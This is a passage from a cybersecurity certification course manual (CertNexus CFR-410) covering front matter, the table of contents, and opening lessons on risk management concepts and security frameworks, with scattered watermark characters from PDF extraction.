CFR 410 PDF

e
ut
CyberSec First
ib
tr
Responder®
is
(Exam CFR-410)
D
or
e
at
lic
up
D
ot
N
o
D
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M

CyberSec First Responder® (Exam
CFR-410)
e
ut
Part Number: CNX0013
Course Edition: 1.0
ib
Acknowledgements
tr
PROJECT TEAM
is
Author Contributing Author Media Designer Content Editor
D
Jason Nufryk, CFR Belton Myers, CFR Brian J. Sullivan Geoff Graser
CertNexus wishes to thank Stacey McBrine, Al Wills, and members of the Logical Operations Instructor Community for their
or
instructional and technical expertise during the creation of this course.
Notices
e
DISCLAIMER
at
While CertNexus, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all
materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or
fitness for a particular purpose. The name used in the data files for this course is that of a fictitious company. Any resemblance to
lic
current or future companies is purely coincidental. We do not believe we have used anyone's name in creating this course, but if we
have, please notify us and we will change the name in the next revision of the course. CertNexus is an independent provider of
integrated training solutions for individuals, businesses, educational institutions, and government agencies. The use of screenshots,
photographs of another entity's products, or another entity's product name or service in this book is for editorial purposes only. No
up
such use should be construed to imply sponsorship or endorsement of the book by nor any affiliation of such entity with CertNexus.
This courseware may contain links to sites on the Internet that are owned and operated by third parties (the "External Sites").
CertNexus is not responsible for the availability of, or the content located on or through, any External Site. Please contact
CertNexus if you have any concerns regarding such links or External Sites.
D
TRADEMARK NOTICES
ot
CertNexus and the CertNexus logo are trademarks of CertNexus, Inc. and its affiliates.
® ®
Microsoft Windows is a registered trademark of Microsoft Corporation in the United States and other countries. Kali Linux™ is a
trademark of Offensive Security in the United States and other countries. All other product and service names used may be
common law or registered trademarks of their respective proprietors.
N
Copyright © 2021 CertNexus, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written
o
permission of CertNexus, 3535 Winton Place, Rochester, NY 14623, 1-800-326-8724 in the United States and Canada,
1-585-350-7000 in all other countries. CertNexus' World Wide Web site is located at www.certnexus.com.
D
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or
other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books
or software. If you believe that this book, related materials, or any other CertNexus materials are being reproduced or transmitted
without permission, please call 1-800-326-8724 in the United States and Canada, 1-585-350-7000 in all other countries.

CyberSec First
Responder® (Exam
e
ut
CFR-410)
ib
tr
is
D
Lesson 1: Assessing Cybersecurity Risk.......................... 1
or
Topic A: Identify the Importance of Risk Management.................... 2
Topic B: Assess Risk..................................................................... 10
e
Topic C: Mitigate Risk...................................................................23
at
Topic D: Integrate Documentation into Risk Management.............37

lic
Lesson 2: Analyzing the Threat Landscape....................53

up
Topic A: Classify Threats.............................................................. 54

Topic B: Analyze Trends Affecting Security Posture.......................66
D
Lesson 3: Analyzing Reconnaissance Threats to

ot
Computing and Network Environments.................. 77

N
Topic A: Implement Threat Modeling............................................ 78

Topic B: Assess the Impact of Reconnaissance..............................86
o
Topic C: Assess the Impact of Social Engineering........................108

D
Lesson 4: Analyzing Attacks on Computing and

Network Environments......................................... 121

| CyberSec First Responder® (Exam CFR-410) |
Topic A: Assess the Impact of System Hacking Attacks......................... 122

Topic B: Assess the Impact of Web-Based Attacks................................ 131
Topic C: Assess the Impact of Malware................................................. 143
Topic D: Assess the Impact of Hijacking and Impersonation Attacks..... 152
Topic E: Assess the Impact of DoS Incidents......................................... 161
e
Topic F: Assess the Impact of Threats to Mobile Security...................... 168
ut
Topic G: Assess the Impact of Threats to Cloud Security.......................173
ib
Lesson 5: Analyzing Post-Attack Techniques...................... 179
tr
Topic A: Assess Command and Control Techniques..............................180
is
Topic B: Assess Persistence Techniques................................................187
Topic C: Assess Lateral Movement and Pivoting Techniques................. 191
D
Topic D: Assess Data Exfiltration Techniques....................................... 202
or
Topic E: Assess Anti-Forensics Techniques.......................................... 209
e
Lesson 6: Assessing the Organization's Security Posture.....217
at
Topic A: Implement Cybersecurity Auditing.......................................... 218

Topic B: Implement a Vulnerability Management Plan........................... 230
lic
Topic C: Assess Vulnerabilities............................................................. 238

Topic D: Conduct Penetration Testing.................................................. 253
up
D
Lesson 7: Collecting Cybersecurity Intelligence...................271

Topic A: Deploy a Security Intelligence Collection and Analysis
ot
Platform........................................................................................... 272
Topic B: Collect Data from Network-Based Intelligence Sources............286
N
Topic C: Collect Data from Host-Based Intelligence Sources................. 302

o
D
Lesson 8: Analyzing Log Data............................................. 315

Topic A: Use Common Tools to Analyze Logs....................................... 316
Topic B: Use SIEM Tools for Analysis.....................................................332

Lesson 9: Performing Active Asset and Network Analysis.... 343

Topic A: Analyze Incidents with Windows-Based Tools......................... 344
Topic B: Analyze Incidents with Linux-Based Tools...............................362
Topic C: Analyze Indicators of Compromise......................................... 372
e
ut
Lesson 10: Responding to Cybersecurity Incidents..............391
Topic A: Deploy an Incident Handling and Response Architecture......... 392
ib
Topic B: Mitigate Incidents................................................................... 407
tr
Topic C: Hand Over Incident Information to a Forensic Investigation ....425
is
Lesson 11: Investigating Cybersecurity Incidents................ 429
D
Topic A: Apply a Forensic Investigation Plan......................................... 430
or
Topic B: Securely Collect and Analyze Electronic Evidence.....................443
Topic C: Follow Up on the Results of an Investigation........................... 460
e
at
Appendix A: Mapping Course Content to CyberSec First Responder®

(Exam CFR-410)......................................................................... 469
lic
Appendix B: Regular Expressions........................................................ 471

up
Topic A: Parse Log Files with Regular Expressions................................ 472
Solutions............................................................................................ 481
D
Glossary............................................................................................. 509
ot
Index.................................................................................................. 529
N
o
D
| Table of Contents |
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

About This Course
e
ut
ib
This course covers network defense and incident response methods, tactics, and procedures
that are in alignment with industry frameworks such as NIST SP 800-61r2 (Computer Security
tr
Incident Handling Guide), US-CERT's National Cyber Incident Response Plan (NCIRP), and
Presidential Policy Directive (PPD)-41 on Cyber Incident Coordination. It is ideal for
is
candidates who have been tasked with the responsibility of monitoring and detecting
security incidents in information systems and networks, and for executing standardized
responses to such incidents. The course introduces tools, tactics, and procedures to manage
D
cybersecurity risks, defend cybersecurity assets, identify various types of common threats,
evaluate the organization's security, collect and analyze cybersecurity intelligence, and
remediate and report incidents as they occur. This course provides a comprehensive
organization. or
methodology for individuals responsible for defending the cybersecurity of their
This course is designed to assist students in preparing for the CertNexus CyberSec First
e
Responder (Exam CFR-410) certification examination. What you learn and practice in this
course can be a significant part of your preparation.
at
In addition, this course and subsequent certification (CFR-410) meet all requirements for
personnel requiring DoD directive 8570.01-M and directive 8140 position certification
lic
baselines:
• CSSP Analyst
• CSSP Infrastructure Support
up
• CSSP Incident Responder

• CSSP Auditor
The course and certification also meet all criteria for the following Cybersecurity Maturity
D
Model Certification (CMMC) domains:

• Incident Response (IR)
ot
• Audit and Accountability (AU)

• Risk Management (RM)
N
Course Description
o
Target Student
This course is designed primarily for cybersecurity practitioners preparing for or who
D
currently perform job functions related to protecting information systems by ensuring their
availability, integrity, authentication, confidentiality, and non-repudiation. It is ideal for
those roles within federal contracting companies and private sector firms whose mission or
strategic objectives require the execution of Defensive Cyber Operations (DCO) or DoD
Information Network (DoDIN) operation and incident handling. This course focuses on
the knowledge, ability, and skills necessary to provide for the defense of those information

systems in a cybersecurity context, including protection, detection, analysis, investigation, and

response processes.
In addition, the course ensures that all members of an IT team—regardless of size, rank, or budget
—understand their role in the cyber defense, incident response, and incident handling process.
Course Prerequisites
To ensure your success in this course, you should meet the following requirements:
• At least two years (recommended) of experience or education in computer network security
e
technology or a related field.
• The ability or curiosity to recognize information security vulnerabilities and threats in the context
ut
of risk management.
• Foundational knowledge of the concepts and operational framework of common assurance
ib
safeguards in network environments. Safeguards include, but are not limited to, firewalls,
intrusion prevention systems, and VPNs.
• General knowledge of the concepts and operational framework of common assurance safeguards
tr
in computing environments. Safeguards include, but are not limited to, basic authentication and
authorization, resource permissions, and anti-malware mechanisms.
is
• Foundation-level skills with some of the common operating systems for computing
environments.
D
• Entry-level understanding of some of the common concepts for network environments, such as
routing and switching.
• General or practical knowledge of major TCP/IP networking protocols, including, but not
or
limited to, TCP, IP, UDP, DNS, HTTP, ARP, ICMP, and DHCP.
Course Objectives
e
In this course, you will identify, assess, respond to, and protect against security threats and operate a
system and network security analysis platform.
at
You will:
• Assess cybersecurity risks to the organization.
lic
• Analyze the threat landscape.

• Analyze various reconnaissance threats to computing and network environments.
• Analyze various attacks on computing and network environments.
up
• Analyze various post-attack techniques.

• Assess the organization's security posture through auditing, vulnerability management, and
penetration testing.
D
• Collect cybersecurity intelligence from various network-based and host-based sources.

• Analyze log data to reveal evidence of threats and incidents.
• Perform active asset and network analysis to detect incidents.
ot
• Respond to cybersecurity incidents using containment, mitigation, and recovery tactics.

• Investigate cybersecurity incidents using forensic analysis techniques.
N
The CHOICE Home Screen

o
Login and access information for your CHOICE environment will be provided with your class
experience. The CHOICE platform is your entry point to the CHOICE learning experience, of
D
which this course manual is only one part.

On the CHOICE Home screen, you can access the CHOICE Course screens for your specific
courses. Visit the CHOICE Course screen both during and after class to make use of the world of
support and instructional resources that make up the CHOICE experience.
Each CHOICE Course screen will give you access to the following resources:
• Classroom: A link to your training provider's classroom environment.
| About This Course |

• eBook: An interactive electronic version of the printed book for your course.
• Files: Any course files available to download.
• Checklists: Step-by-step procedures and general guidelines you can use as a reference during
and after class.
• Assessment: A course assessment for your self-assessment of the course content.
• Social media resources that enable you to collaborate with others in the learning community
using professional communications sites, such as LinkedIn, or microblogging tools, such as
Twitter.
e
Depending on the nature of your course and the components chosen by your learning provider, the
CHOICE Course screen may also include access to elements such as:
ut
• LogicalLABS, a virtual technical environment for your course.
• Various partner resources related to the courseware.
ib
• Related certifications or credentials.
• A link to your training provider's website.
tr
• Notices from the CHOICE administrator.
• Newsletters and other communications from your learning provider.
is
• Mentoring services.
Visit your CHOICE Home screen often to connect, communicate, and extend your learning
D
experience!
How to Use This Book

As You Learn or
This book is divided into lessons and topics, covering a subject or a set of related subjects. In most
e
cases, lessons are arranged in order of increasing proficiency.
The results-oriented topics include relevant and supporting information you need to master the
at
content. Each topic has various types of activities designed to enable you to solidify your
understanding of the informational material presented in the course. Information is provided for
lic
reference and reflection to facilitate understanding and practice.

Data files for various activities as well as other supporting files for the course are available by
download from the CHOICE Course screen. In addition to sample data for the course exercises, the
up
course files may contain media components to enhance your learning and additional reference
materials for use both during and after the course.
Checklists of procedures and guidelines can be used during class and as after-class references when
D
you're back on the job and need to refresh your understanding.

At the back of the book, you will find a glossary of the definitions of the terms and concepts used
throughout the course. You will also find an index to assist in locating information within the
ot
instructional components of the book. In many electronic versions of the book, you can click links
on key words in the content to move to the associated glossary definition, and on page references in
the index to move to that term in the content. To return to the previous location in the document
N
after clicking a link, use the appropriate functionality in your PDF viewing software.
As You Review
o
Any method of instruction is only as effective as the time and effort you, the student, are willing to
D
invest in it. In addition, some of the information that you learn in class may not be important to you
immediately, but it may become important later. For this reason, we encourage you to spend some
time reviewing the content of the course after your time in the classroom.

As a Reference
The organization and layout of this book make it an easy-to-use resource for future reference.
Taking advantage of the glossary, index, and table of contents, you can use this book as a first
source of definitions, background information, and summaries.
Course Icons
Watch throughout the material for the following visual cues.
Icon Description
e
A Note provides additional information, guidance, or hints about a topic or task.
ut
A Caution note makes you aware of places where you need to be particularly careful
ib
with your actions, settings, or decisions so that you can be sure to get the desired
results of an activity or task.
tr
Checklists provide job aids you can use after class as a reference to perform skills
back on the job. Access checklists from your CHOICE Course screen.
is
Social notes remind you to check your CHOICE Course screen for opportunities to
interact with the CHOICE community using social media.
D
or
e
at
lic
up
D
ot
N
o
D

1 Assessing Cybersecurity
Risk
e
ut
Lesson Time: 3 hours
ib
tr
is
Lesson Introduction
D
As a security professional, you are familiar with the ways in which information is vulnerable
to theft, destruction, alteration, and unavailability. But good security is not just a process of
or
reacting to individual threats when they appear or closing holes when they are discovered—
it's a process of understanding how your information, by its very nature and the ways in
which it is used, is at risk of being compromised. When you understand the risks you face
from a foundational level, you can better prepare yourself to reduce or eliminate the chances
e
of a security incident occurring and the impact it will have on your information.
at
Lesson Objectives
lic
In this lesson, you will:

• Identify the strategic value of risk management in the context of cybersecurity.
up
• Assess risks that affect the organization.

• Translate risk assessment into specific strategies for mitigation.
D
• Integrate documentation into risk management.

ot
N
o
D

2 | CyberSec First Responder® (Exam CFR-410)
TOPIC A
Identify the Importance of Risk Management
In our highly connected world, technology accelerates exponentially, granting newer and faster ways
for human beings to work with information. With this rapid growth, it is inevitable that threats to
our information advance just the same. The significance of security in modern information systems
e
cannot be overstated.
ut
Cybersecurity
ib
Elements of
Cybersecurity (Endpoint
Model)
tr
Elements of
Cybersecurity (Perimeter
is
Model)
Consider contrasting the
D
endpoint model (mall)
image with the perimeter
model (castle) image.
Securing endpoint
access is a more up-to-
date model that
addresses the
challenges of remote
or
e
access and
telecommuting. The
at
perimeter model is an
older style that
automatically distrusts
lic
anything outside the

perimeter and implicitly
trusts anything on the
up
inside.
Figure 1-1: Elements of cybersecurity.

D
Cybersecurity refers to the protection of personal or organizational information or information

resources from unauthorized access, attacks, theft, or data damage. In the context of cybersecurity,
ot
you will encounter various common terms that have special meaning.
Term Description
N
Asset Anything of value that could be compromised, stolen, or harmed,

including information, physical resources, and reputation.
o
Threat Any event or action that could potentially cause damage to an asset or
D
interruption of services.
Attack The intentional act of attempting to bypass one or more security services
or controls of an information system.
Vulnerability A condition that leaves the system and its assets open to harm—including
such things as software bugs, insecure passwords, inadequate physical
security, and poorly designed networks.
Lesson 1: Assessing Cybersecurity Risk | Topic A

CyberSec First Responder® (Exam CFR-410) | 3
Term Description
Exploit A technique that takes advantage of a vulnerability to perform an attack.
Exploit may also refer to a packaged form of the technique, such as an
application or script that automates the technique so even an unskilled
attacker can use the exploit to perform an attack.
Control A countermeasure that you put in place to avoid, mitigate, or counteract
security risks due to threats or attacks.
e
The Risk Equation
ut
As a cybersecurity professional, your responsibility is to identify risks and protect your systems from The Risk Equation
them. In this context, risk is a measure of your exposure to the chance of damage or loss. It signifies
ib
the likelihood of a hazard or dangerous threat to occur. Risk is often associated with the loss of a
system, power, or network, and other physical losses. However, risk also affects people, practices,
tr
and processes.
Although there seem to be unlimited possibilities and variations when it comes to attacks, the time
is
and resources you can devote to securing an asset are unfortunately limited. You must determine
how to deal with various risks when you plan your asset security, which is a process called risk
D
management. To effectively manage risk, you need to consider the factors inherent in the risks you
are dealing with.
Risk is often considered to be composed of three factors, as expressed in the following formula: The term "consequence"
Risk = Threats × Vulnerabilities × Consequences

or
• A threat is something or someone that can take advantage of vulnerabilities.
• A vulnerability is a weakness or deficiency that enables an attacker to violate the system's
is used by the
Department of
Homeland Security.
Students may also have
e
seen this same formula
integrity. using the word "impacts"
at
• A consequence, also called an impact, is damage that occurs because the threat took advantage of instead of
the vulnerability. There are technical impacts as well as business impacts, and the former usually "consequences."
leads to the latter. These consequences
lic
are only an example.

Some malware may
produce consequences
other than those listed
up
here.
D
ot
N
o
D
Figure 1-2: The risk equation.
In the example in the figure, an attacker tricks an inexperienced user (the vulnerability) into installing
ransomware (the threat) on their workstation, encrypting the data on the workstation as well as any
mapped network shares, making the data unreadable (the technical consequence). If the organization

has no backups of the data, it may be gone forever and impossible to reconstruct; if such data is
mission critical, the organization may lose its competitive advantage. Stakeholders in the
organization then lose confidence, and may be less likely to continue supporting the organization.
Risk Management
Risk Management By estimating the extent of the three factors comprising risk, you can determine the extent of the
risk, which will guide your decision on how to deal with it. For example, even though a particular
vulnerability is easy to take advantage of and the threat of someone taking advantage of it is high, if
e
the consequences are trivial or non-existent, then you might deem the risk to be acceptable and
ut
prevention measures to be unnecessary. On the other hand, if the vulnerability and threat are low
but the consequences are quite high, you might deem the risk to be unacceptable, and choose to
spend time and effort to implement safeguards.
ib
You may not be in a position to make all the decisions regarding risk management. Such decisions
may be made by business stakeholders or a project management team. However, you may be in a
tr
unique position to understand where certain technical risks exist and need to bring them to the
attention of decision makers.
is
The reason why risk is managed rather than outright eliminated is because risk is not always in
opposition to an organization's goals. In fact, if you tried to eliminate risk altogether, the
organization would cease to function. You'd be completely disconnected, you wouldn't be able to
D
use any electronic devices, and operations would grind to a halt. That's why risk management is a
process of understanding what risks you can take, as long as the reward is worth the risk.
The Risk Management

The Risk Management Process or
To meet the ever-evolving needs of information security, an information assurance professional
e
Process must be able to manage the risks their information is exposed to. Risk management is typically
defined as the cyclical process of identifying, assessing, analyzing, and responding to risks. This
at
process is not meant to end; as long as information exists, it will need protecting. Therefore, risk
management recurs indefinitely so that you may, at all times, keep your information as secure as
lic
possible.
Without risk management, your security will be passive; and when you secure your information
passively, it will be at the mercy of the quickly changing tides of technological advancement.
up
Consider informing
students there are
several other ways to
D
represent the cycle of

risk management.
Some, for example,
blend assessment and
ot
analysis together.
N
o
D
Figure 1-3: One way to represent the cycle of risk management.

Risk Exposure
Risk exposure is the property that dictates how susceptible an organization is to loss. When Risk Exposure
quantified, risk exposure is usually defined by multiplying the probability that an incident will occur
by the expected impact or loss if it does occur. For example, if you expect the likelihood of
ransomware wiping out your critical data to be 10%, and you estimate that the loss of such data
would cost the organization $100,000, then your risk exposure is .10 × 100,000 = $10,000. Of
course, this assumes that such a risk can be neatly quantified.
An organization exposes itself to risk in every action it takes. These actions occur during the process Qualitative vs.
e
of an organization conducting business, and the constant need for assessing those risks has given quantitative risk analysis
is discussed shortly.
ut
rise to the security industry as a whole. Without risk, there would be no need for security, as there
would be no consequences to poorly executed business processes. Since businesses are highly
dependent on the latest technologies, an increasing amount of risks involve cybersecurity
ib
professionals as the primary means to manage those risks.
Through risk management, an organization can keep its risk exposure low, but it can never really
avoid it entirely. This is why it is so critical for security professionals to constantly be vigilant for the
tr
elements of risk—including threats, attacks, and vulnerabilities—that have the potential to cause
harm to the organization's assets. Ignoring your organization's exposure to risk will limit its ability to
is
survive in any industry.
D
Risk Analysis Methods
Cybersecurity professionals conduct risk analysis to determine how to protect devices, networks, Risk Analysis Methods
or
information, and other assets to minimize damage to the organization. The style of the content and
output of any risk analysis must reflect the framework and jurisdiction within which the organization
is operating. For example, within the UK, risk analysis undertaken for a government or as part of
The National Institute of
Standards and
Technology (NIST)
includes only qualitative
e
government contracts must present the outputs in business language. In contrast, if risk analysis is
being undertaken as part of an ISO 27000 certification, then no such constraint exists apart from the and quantitative risk
at
likelihood and consequences of risks being communicated and understood. analysis methods in SP
800-30.
The risk analysis methods used to calculate for exposure can fall into one of three categories.
lic
Method Description
Qualitative Qualitative analysis methods use descriptions and words to measure the
up
likelihood and impact of risk. For example, impact ratings can be severe/
high, moderate/medium, or low; and likelihood ratings can be likely,
unlikely, or rare.
D
Qualitative analysis is generally scenario based. A weakness of qualitative

risk analysis lies with its sometimes subjective and untestable
methodology. You can also assign numbers between 0 and 9 for
ot
exposures and damage potential. However, you do not perform

calculations on the numbers assigned to the risks. The goal of qualitative
assessment is to rank the risks on a scale of 1 to 25, for example.
N
Quantitative Quantitative analysis is based completely on numeric values. Data is

analyzed using historical records, experiences, industry best practices and
o
records, statistical theories, testing, and experiments.

D
This method may be weak in situations where risk is not easily

quantifiable. The goal of quantitative analysis is to calculate the probable
loss for every risk.

Method Description
Semi-quantitative A semi-quantitative analysis method exists because it's impossible for a
purely quantitative risk assessment to exist given that some issues defy
numbers. For example, how much is your employee morale worth in
terms of dollars? What is your corporate reputation worth?
A semi-quantitative analysis attempts to find a middle ground between
the previous two risk analysis types to create a hybrid method.
e
The Impact of Risks on the Organization
ut
The Impact of Risks on As an information assurance professional, you're likely to face risk in many different forms. Before
ib
the Organization you can even begin to mitigate risks, you need to know where they exist within your organization
Ask students if they can and identify how they can cause harm. The following table categorizes various types of risk that you
think of any other types may encounter in your organization. Keep in mind that risks are not necessarily technical, but can be
tr
of risk that may affect articulated in business terms.
their organization.
is
Risk Type Description and Impact
Legal Every organization, no matter the industry, must comply with certain laws
D
and regulations to stay within legal boundaries. For example, customer
protection laws are put in place by most governments that penalize
organizations that engage in activities that defraud the consumer.
or
Other unethical business practices, unscrupulous employees, and
negligent management can all place your organization in jeopardy. If the
organization is not in compliance, it may be served with a notification
e
first, and more severe penalties could follow if the issue is not addressed
in a sufficient and timely manner. The organization cannot only run afoul
at
of certain laws, but can also be subjected to litigation by certain parties

who feel they deserve recompense. In addition, mounting legal fees can
have a significant monetary effect on the organization.
lic
Financial Your organization likely has expected revenue and profit margins based
on a number of calculations, and many different threats can cause your
up
business to fail to meet monetary expectations. Financial risks may

seriously affect your organization's survivability in a competitive
marketplace. These risks can have a direct impact on your finances—like
an immediate loss in profitability—or the effects can be more indirect,
D
like an impact to operational expenses that can subtly decrease

productivity due to lack of spending on required resources.
ot
You should also consider how a particularly devastating and/or insidious

threat may influence insurance costs, as these can often be a risk unto
themselves.
N
Physical assets Depending on your organization's size, you may have a great deal of
valuable physical property stored in various company sites. Any physical
o
product that your organization sells is your primary concern. Electronics

such as computers, industrial machinery, and office appliances are also at
D
risk of being stolen or otherwise damaged.

Both human threats and environmental factors may put your physical
assets at risk.

Risk Type Description and Impact

Intellectual property Organizations that create and own intellectual property, such as
entertainment media, software, trade secrets, and product designs, all risk
having these ideas and concepts destroyed or used in unauthorized ways.
Although intellectual property is typically not stolen in the same sense as
physical theft, a threat may infringe on trademarks and copyrights that
you have in place.
A threat that destroys or alters your intellectual property may make it
e
extremely difficult or even impossible to recover. Sophisticated data
ut
exfiltration techniques can also make it difficult for you to even spot a
breach of your intellectual property in the first place.
Infrastructure An organization must depend on its infrastructure to function at
ib
maximum efficiency. Whether physical or abstract, the frameworks that
hold an organization together are vulnerable to a number of threats. This
tr
is particularly true of any infrastructure that supplies power or facilitates
transportation.
is
Infrastructure risk affects the business at its foundational level.
Operations Day-to-day operations are what keep your organization running and
D
fulfilling not just its monetary expectations, but also its vision. Even if
there are no immediate financial consequences, the organization risks
losing its foothold in the marketplace, and its products or services may no
or
longer be viable. Especially damaging are risks that impact the
organization's operational capacity (i.e., its ability to execute many
business processes at once).
e
Likewise, operational risks can have an impact on the time that personnel
or other assets spend on addressing the effects of the risk—time that
at
would have otherwise been spent running normal business processes. If

certain cybersecurity processes prove to be ineffective at mitigating a risk,
lic
then improvements to these cybersecurity processes may be required,

further affecting overall business operations.
Reputation The public's perception of an organization may greatly affect its success,
up
and in some cases, may doom it to failure. A business often must

maintain great relationships with its customers and ensure that society at
large views it positively.
D
Your organization's brand may be devalued if the public reacts negatively

to scenarios such as theft of personal data, unethical business practices,
and a decline in the quality of products and services. These scenarios can
ot
also negatively impact the effectiveness of public relationship

management programs.
N
Health Whether it's your employees or the customers they work with, people are
at risk of harm as a result of your operations. Although high-risk
industries like law enforcement have obvious health concerns, even
o
typical businesses can put their personnel and customers at risk by

providing unsafe, untested products and services.
D
Physical assets like industrial machinery and electrical equipment may

pose significant health risks to employees who use them.

ACTIVITY 1-1
Identifying the Importance of Risk Management
Scenario
e
You are a member of the cybersecurity team at Develetech Industries, a manufacturer of home
electronics located in the fictitious city and state of Greene City, Richland (RL). The CEO has
ut
recently placed you in charge of maintaining your company's security in the face of a wide variety of
threats that target every dimension of your operations.
ib
Before you can dive into the diverse and complex world of cybersecurity, you need to develop your
organizational security strategies following the principle of risk management. When you can identify
just how risk can negatively affect your organization, you'll be able to convince your employer, team,
tr
and the rest of your employees of the importance of managing that risk.
is
Activity: Identifying the
Importance of Risk
Management 1. Develetech, a relatively large electronics manufacturer, is looking to expand
D
its business domestically and internationally over the next couple of years.
This may include everything from taking on new staff to establishing additional
offices and warehouses.
or
Why would these changes necessitate the re-evaluation of a risk
management strategy?
e
A: Answers will vary, but significant changes can bring about risk in many different ways. It may
at
become more challenging to secure sensitive information and keep it out of unauthorized hands,
or it may simply require more resources to secure more at-risk areas. Managing risk to information
and systems will help your organization avoid legal and financial disasters. Additionally, there will
lic
be pressure from stakeholders, customers, and regulatory entities to conform to their expectations
and meet standardization requirements. There is also the chance that an increase in the amount
of communications in the organization will exponentially increase the amount of risk that these
communication channels take on. You need to make sure changes to your organization can
up
uphold risk management expectations.
2. What are the specific types of risk that could affect Develetech as it expands
D
its business?
A: Answers will vary, as there are many potential risks. Additional offices and warehouses will require
an infrastructure overhaul, which will require a reevaluation of infrastructural integrity. Certain
ot
physical assets, including computers and networking equipment, may not be able to sustain an
increase in operational capacity. More personnel may increase the risk of a safety incident. Failing
to understand and adhere to laws and regulations, especially when moving operations into a
N
foreign country, may create legality issues for the organization. Financially, a security breach
could cost the organization a great deal, and its reputation may suffer as a result. There may also
be potential issues with the supply chain, which can have operational impacts on the business.
o
D

3. You've identified a risk to the availability of your file servers at peak traffic
hours.
What risk analysis method would you prefer to use to determine Develetech's
risk exposure in this area, and why?
A: Answers will vary, but most organizations choose a combination of both quantitative and
qualitative analysis methods with an emphasis one way or the other. When it comes to risk, there
is not necessarily an objectively right answer. Quantitative analysis tends to be more precise, but
it's also expensive and not always feasible; qualitative analysis tends to be faster and cheaper,
e
but it's not always useful. Semi-quantitative analysis may be able to leverage the strengths of both
while minimizing their weaknesses. In any case, you may need more information about a situation
ut
before the best approach becomes obvious.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

TOPIC B
Assess Risk
Now that you've identified the importance of risk management, you can begin the management
process by assessing how risk will impact your organization. For any organization, there are many
different elements of normal business operations that may affect its risk profile. Being able to
e
identify how these elements are relevant to your organization's security will prevent you from
missing crucial information when the time comes to mitigate risk.
ut
Security Standards and Frameworks
ib
Security Standards and The cybersecurity industry has many different standards and frameworks that can help an
Frameworks (2 Slides) organization define its cybersecurity goals and how to achieve those goals. Many of these standards
tr
Each of the documents and frameworks address risk specifically, or they are at least relevant to risk management indirectly.
mentioned in this topic In particular, you can use these documents to help guide your risk assessment practices.
is
could fill an entire
course. Ensure students
The following table briefly describes some of the most common standards and frameworks that
focus on cybersecurity.
D
understand they're being
given a high-level
overview of them, not an Standard or Framework Description
in-depth tour.
Consider asking
students if they
understand the
distinction between
NIST Cybersecurity Framework
orThe National Institute of Standards and Technology
(NIST), a non-regulatory agency of the United States
government, publishes numerous documents on a wide
range of security topics. The Cybersecurity Framework, first
e
standards and published in 2014, is a unified framework that provides
frameworks vs. laws and
at
guidance to organizations for managing their risk. The most

regulations. recent version as of mid-2021 is version 1.1, released in
2018.
lic
The Cybersecurity Framework seeks to adopt a common

language for best practices in the realm of cybersecurity so
that any organization can apply that guidance to its own
up
environment. It includes three major sections: "Core," which

defines cybersecurity activities and their outcomes in several
functional areas; "Profile," which includes outcomes
specifically chosen by the organization based on its needs;
D
and "Tiers," which demonstrate how an organization's

application of risk management aligns with various
characteristics defined by the Cybersecurity Framework.
ot
NIST SP 800-61 NIST's 800 series Special Publications (SP) focus on

computer security. This particular publication is titled
N
Computer Security Incident Handling Guide. As the name implies,

it provides guidance and recommendations during the
incident response process. The latest version, published in
o
2012, is version 2.
D
Lesson 1: Assessing Cybersecurity Risk | Topic B

Standard or Framework Description

RMF The Risk Management Framework (RMF), developed by
NIST and used by the U.S. Department of Defense, includes
processes for integrating information assurance and risk
management strategies into the systems development
lifecycle (SDLC). The RMF is outlined in two 800 series
publications: SP 800-37, Risk Management Framework for
Information Systems and Organizations: A System Life Cycle
e
Approach for Security and Privacy, and SP 800-53, Security and
Privacy Controls for Information Systems and Organizations.
ut
COBIT Control Objectives for Information and Related Technology
(COBIT), created by ISACA®, provides a framework for IT
ib
management and governance. It promotes five principles:
meeting stakeholder needs; covering the organization end to
end; applying a single, integrated framework; enabling a
tr
holistic approach; and separating governance from
management. The most recent version is COBIT 2019.
is
ITAF The Information Technology Assurance Framework
(ITAF™), also published by ISACA, focuses primarily on
D
auditing. ITAF provides guidance for the roles and
responsibilities of auditors, as well as guidance for the
overall audit process and how to incorporate risk assessment
ISO/IEC 27000 series

edition, released in 2020.or
in that process. The most recent version is the fourth
Developed by the International Organization for

e
Standardization (ISO) and the International
Electrotechnical Commission (IEC), the ISO/IEC 27000
at
series is a large family of IT security standards. For example,

ISO/IEC 27001 provides comprehensive guidance on
lic
information assurance principles and processes; ISO/IEC

27000 provides an overview of IT security and vocabulary;
ISO/IEC 27033 focuses on network security; ISO/IEC
up
27040 focuses on data storage security; and many more.

Standard of Good Practice for This is a standard published by the Information Security
Information Security Forum (ISF) that focuses on helping businesses understand
and address evolving security issues in the subject areas of
D
compliance, threats, and risk management. The latest version

is from 2020.
ot
RFC 2196 Titled Site Security Handbook, this Request for Comments
(RFC) publication provides guidance on securing sites that
have Internet-connected systems. The publication includes
N
subject matter like best practices for policy writing, network

and systems security, and incident response. It was published
in 1997.
o
CIS Controls The Center for Internet Security (CIS) lists 18 general
D
control categories, also called the Critical Security Controls.

Example categories include data protection, malware
defenses, and access control management. CIS provides
specific security procedures and action items for each
control category in a checklist format. The most recent
update, version 8, was released in 2021.


ISA/IEC-62443 Also referred to as ANSI/ISA-62443, and formerly known
as ANSI/ISA-99, this is a series of standards that provides
guidance and best practices for implementing security in
industrial control systems (ICSs). It was initially developed
by the International Society of Automation (ISA), published
by the American National Standards Institute (ANSI), and
then adopted by the International Electrotechnical
e
Commission (IEC).
NERC 1300
ut
This is a standard first published in 2004 by the North
American Electric Reliability Corporation (NERC) for the
security of bulk electric systems (BESs), which the NERC
ib
defines as any "transmission element" that operates at 100
kilovolts (kV) or higher and "real power" and "reactive
power" resources connected at 100 kV or higher. Essentially,
tr
this standard applies to hardware and software components
that may support or interface with certain electrical systems.
is
SSAE 18 The Statement on Standards for Attestation Engagements
no. 18 is an auditing standard published in 2018 by the
D
American Institute of Certified Public Accountants
(AICPA). It is primarily focused on assuring that financial
